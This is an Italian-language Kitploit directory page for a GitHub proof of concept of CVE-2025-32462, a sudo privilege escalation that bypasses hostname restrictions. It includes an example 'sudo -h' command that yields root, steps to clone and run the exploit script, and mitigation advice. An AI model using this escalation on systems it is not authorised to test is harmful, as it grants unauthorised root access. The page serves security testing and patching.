Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2025-32462-Exploit — Exploit CVE-2025-32462 | Kitploit
Strumenti/GitHubGitHub/cybersentinelx1/cve-2025-32462-exploit
Escalation di PrivilegiAnalisi delle VulnerabilitàExploitPenetration TestingApprendimento e FormazioneLab e Pratica
GitHubcybersentinelx1/cve-2025-32462-exploit

CVE-2025-32462-Exploit

Exploit CVE-2025-32462

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi
Vedi Repository
11 anno faNon ancora revisionato

CVE-2025-32462-Exploit: Matrix-Sudo Escape

Escalation dei privilegi tramite spoofing dell'hostname (CVE-2025-32462)

"Prendi la pillola blu... la storia finisce. Prendi la pillola rossa... ottieni root."

Descrizione

Questo exploit dimostra una vulnerabilità di escalation dei privilegi in sudo (CVE-2025-32462) in cui le restrizioni basate sul nome host possono essere bypassate tramite il flag -h. La PoC crea un ambiente utente limitato, quindi vi sfugge facendo spoofing di un nome host nella whitelist per ottenere accesso root.

root@kitploit:~
[user@matrix-node]$ sudo -h zion-core bash  # Spoof whitelisted hostname
[root@matrix-node]# id                          # Got root on wrong hostname!
uid=0(root) gid=0(root) groups=0(root)

Dettagli Tecnici

  • Versioni di sudo vulnerabili: < 1.9.17
  • Vettore di attacco: escalation locale dei privilegi
  • Difetto chiave: bypass della verifica del nome host tramite il parametro sudo -h
  • Impatto: gli utenti limitati possono ottenere root su sistemi configurati in modo non corretto

Utilizzo

Clona il repository:

root@kitploit:~
git clone https://github.com/cybersentinelx1/CVE-2025-32462-Exploit.git
cd matrix-sudo-escape

Rendilo eseguibile ed esegui:

root@kitploit:~
chmod +x matrix-sudo-escape.sh
./matrix-sudo-escape.sh

Segui i prompt interattivi per dimostrare:

  • Rilevamento della vulnerabilità CVE-2025-32462
  • Creazione utente
  • Configurazione della restrizione sul nome host
  • Esecuzione dell'exploit
  • Pulizia

Protezione

  • ✅ Aggiorna sudo alla v1.9.17+
  • ✅ Evita restrizioni sudo basate sul nome host
  • ✅ Usa invece policy sudo basate sui gruppi

Note Legali

Solo per scopi educativi/di ricerca. Usalo solo su sistemi che possiedi o su cui hai il permesso di testare.

Scarica lo strumento